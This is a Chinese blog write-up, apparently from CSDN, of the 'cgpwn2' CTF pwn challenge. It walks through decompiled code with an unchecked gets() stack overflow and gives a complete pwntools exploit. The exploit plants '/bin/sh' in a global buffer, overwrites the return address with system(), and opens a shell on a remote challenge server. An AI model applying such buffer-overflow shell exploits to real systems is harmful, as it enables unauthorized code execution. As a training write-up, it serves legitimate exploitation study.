cgpwn2 writeup

最新推荐文章于 2023-10-31 16:35:53 发布
最新推荐文章于 2023-10-31 16:35:53 发布
阅读量1.6k 收藏 1
点赞数 2
分类专栏: 攻防世界pwn题wp pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43394612/article/details/85993250
版权

拿到题目检查防护:
在这里插入图片描述
简单运行下:
在这里插入图片描述
放到ida里看下:
在这里插入图片描述
hello函数的代码如下:

char *hello()
{
  char *v0; // eax
  signed int v1; // ebx
  unsigned int v2; // ecx
  char *v3; // eax
  char s; // [esp+12h] [ebp-26h]
  int v6; // [esp+14h] [ebp-24h]

  v0 = &s;
  v1 = 30;
  if ( (unsigned int)&s & 2 )
  {
    *(_WORD *)&s = 0;
    v0 = (char *)&v6;
    v1 = 28;
  }
  v2 = 0;
  do
  {
    *(_DWORD *)&v0[v2] = 0;
    v2 += 4;
  }
  while ( v2 < (v1 & 0xFFFFFFFC) );
  v3 = &v0[v2];
  if ( v1 & 2 )
  {
    *(_WORD *)v3 = 0;
    v3 += 2;
  }
  if ( v1 & 1 )
    *v3 = 0;
  puts("please tell me your name");
  fgets(name, 50, stdin);
  puts("hello,you can leave some message here:");
  return gets(&s);
}

函数上面一大串代码都没啥用。
主要是这里:
在这里插入图片描述
这个name是全局变量。
在这里插入图片描述
程序本身调用了system函数,但是没有现成的/bin/sh字符串,可以使用fgets将/bin/sh字符串读入bss区,然后将返回地址覆盖为system函数,参数布置为name的首地址。
在这里插入图片描述
完整exp如下:

from pwn import*

a=remote("111.198.29.45","32475")

bin_sh_addr=0x0804A080

a.recvuntil("\n")

a.sendline("/bin/sh")

a.recvuntil("\n")

system_addr=0x08048420

payload='A'*42+p32(system_addr)+p32(system_addr)+p32(bin_sh_addr)

a.send(payload)

a.interactive()
dittozzz
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 7
    评论
专栏目录
[攻防世界]cgpwn2
逆向萌新的博客
06-11 352
[攻防世界]cgpw2n
攻防世界pwn——cgpwn2
qq_62076255的博客
11-05 289
攻防世界pwn——cgpwn2
PWN做题笔记5-cgpwn2(已修订)
qq_40923256的博客
04-19 179
原题地址:https://adworld.xctf.org.cn/task/answer?type=pwn&number=2&grade=0&id=5059&page=1 32位ELF文件 未开启ALSR 程序实现依次进行两次输入 ida反汇编,main函数无注入点,hello函数第二次输入无边界检查,可以溢 由于pwn方法包含了system方法,因此属于ret2libc漏洞 又由于未提供/bin/sh字符串,需要通过向.bss存储的...
pwn之cgpwn2
qq_43430261的博客
10-22 725
https://blog.csdn.net/qq_43986365/article/details/94974853 https://blog.csdn.net/Closing_time/article/details/100428850 https://www.jianshu.com/p/3d19056282bf https://bbs.pediy.com/thread-254851.htm ...
攻防世界pwn[cgpwn2]
SUOYE_GUANXING的博客
10-31 74
将 "/bin/sh" 写入name, 用gets函数进行栈溢, system为返回值, name为system的参数。flag为:cyberpeace{b232df4322e677518de6a61097130634}下载文件,先check一下;这里需要0x26+0x4才能到我们的返回地址;发现system,但没有/bin/sh;跟进name发现它是一个静态地址;学的还是有点迷,但慢慢来嘛~32位的ida打开;进入hello函数;
2023 强网杯 Writeup
最新发布
01-29
2023 强网杯 Writeup
BJDCTF 2nd writeup(二)
01-21
文章目录Misc[BJDCTF 2nd]A_Beautiful_Picture[BJDCTF 2nd]小姐姐-y1ng[BJDCTF 2nd]TARGZ-y1ng[BJDCTF 2nd]Imagin – 开场曲Crypto[BJDCTF 2nd]cat_flag[BJDCTF 2nd]燕言燕语[BJDCTF 2nd]Y1nglish ...
古典加密writeup
01-05
做CTF时遇到的古典加密的问题,自己写的writeup,信息安全专业的
[SECT2019] —writeup撰写.docx
11-28
writeup CTF
攻防世界cgpwn2
zyh18851473527的博客
08-05 712
首先checksec,之后放入IDA中 点进hello 发现gets()函数可能会存在栈溢,然后我们点进name 发现 name 地址是固定的,那我们可以它写入 bin/sh ,接着看能不能找到system 找到啦!所以这个题目的思路是:通过栈溢漏洞,调用system函数,同时在name中写入"/bin/sh",把参数地址设置为name的首地址,就可以getshell了! gets() ...
2020第十三届全国大学生信息安全竞赛大部分题目
08-22
除了pwn类题和web的easy_unserialize全都有
攻防世界PWN-cgpwn2
Deeeelete的博客
11-14 333
题目:cgpwn2 拖进PE查看一下 32位程序 checksec查看 简单执行一下 开32位IDA f5反编译main函数 main函数中直接就是输了,输入的内容好像藏在了hello方法里 双击进去查看 单独拿源码 char *hello() { char *v0; // eax@1 signed int v1; // ebx@1 unsigned int v2; // ecx@3 char *v3; // eax@5 char s; // [sp+12
攻防世界 when_did_you_born
09-28 239
1.题目 2.IDA反汇编C程序 3.程序流程分析 首先输入Birth,如果Birth==1926直接退;否则,输入Name,这时,判断Birth是否==1926.等于则get flag。 很明显,输入名字就是专门为我们提供溢点的。两个变量的位置如下图: 0x20 - 0x18 = 0x8 也就是说name和birth之间间距8个单元。exp如下 from pwn import * #io = process('./when_did_you_born') io = remo
0x00 cg_pwn2【XCTF攻防世界pwn系列writeup】
weixin_36711901的博客
11-20 392
目录一、基本情况分析:二、构造payload:三、EXP:合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导与导入导导入 一、基本情况分析: 首先对可执行文件进行基本检查: 如图所示,该文件为32位i386的ELF可执行文件,只开启了NX,RELRO(部分
攻防世界-wp-MISC-新手区-7-如来十三掌
Scorpio_m7
10-20 489
题目描述: 菜狗为了打败菜猫,学了一套如来十三掌。 题目附件: 833e81c19b2b4726986bd6a606d64f3c.docx 题目思路: 真是要念经啊: 夜哆悉諳多苦奢陀奢諦冥神哆盧穆皤三侄三即諸諳即冥迦冥隸數顛耶迦奢若吉怯陀諳怖奢智侄諸若奢數菩奢集遠俱老竟寫明奢若梵等盧皤豆蒙密離怯婆皤礙他哆提哆多缽以南哆心曰姪罰蒙呐神。舍切真怯勝呐得俱沙罰娑是怯遠得呐數罰輸哆遠薩得槃漫夢盧皤亦醯呐娑皤瑟輸諳尼摩罰薩冥大倒參夢侄阿心罰等奢大度地冥殿皤沙蘇輸奢恐豆侄得罰提哆伽諳沙楞缽三死怯摩大蘇者數一遮 与佛
xctf_如来十三掌
bring_coco的博客
07-11 618
如来十三掌 [目标] 破解密文 [环境] Windows [工具] 与佛论坛 Rot13解码 Base64解码 [分析] 1.打开该文件,发现处于word中的一堆经文 一开始只是对黑体字产生疑惑,但最终发现什么用也没有 2.经过其他人的wp,才了解到设计经文的是与与佛论坛有关,也是属于编码解码网站,因此通过密文解明文得到一串编码。注意,密文开头都为佛曰: 3.得到一串编码,因为题目是如来十三掌,因此感觉是rot13编码,ROT13码意思是将字母左移13位。如’A’ ↔ ‘N’, ‘B’ ↔ ‘O’,‘V
【攻防世界pwn-cgpwn2
a_silly_coder的博客
01-15 1425
下载文件后,首先检查保护: 随后将文件拖入ida,查看源码,在hello函数中,发现了如下代码 首先用安全的fgets输入了一个变量,接着用不安全的gets接收了一个变量,在此处可以确认是栈溢,且溢点就在此处。 开始寻找利用方式,发现了system函数 还缺一个"/bin/sh"字符串,找遍了代码,没有发现,但是由于此前可以有一个自己的输入,保存在name变量上,即可以自己手动输入"/bin/sh",自此,设计栈结构为: 开始编写脚本: from pwn imp...
攻防世界: cgpwn2
qq_41071646的博客
01-02 4150
这个题 也是新手入手的题 比较简单   怎么说呢 就是一个简单的构造罢了 点进hello  然后发现  然后我们点进name   发现 name 地址是固定的 我们可以将这个写入 bin/sh 就可以了 然后看 system列表    这里可以看的来  是有42个 字符  就可以 返回我们gets 的返回地址  然后  我们 只需要 讲system 搞进去 然后输入...
XCTF-pwn-cgpwn2 - Writeup
菜小狗.的博客
08-13 6713
虽然现在做的pwn题虽然很简单,但是已经慢慢的开始对解pwn题的过程有一些基础的思路了。 首先惯例流程走一遍: 丢到ida 瞅一眼 有看到system但是没有看到/bin/sh 查看hello的伪代码发现一些有趣的东西: 在这儿看到了gets()函数,这说明可能在这儿存在溢漏洞。 同时点开上面的name,发现name固定的全局变量bss段 因而我们可以将/bin/sh构造进这个地址当中。...
iscc2015官方writeup
09-06
iscc2015是国际信号与通信会议(International Symposium on Communication and Information Technologies)的官方writeup,在这个writeup中,主要回顾了iscc2015会议的主要内容和成果。 iscc2015会议是由IEEE...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 7
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值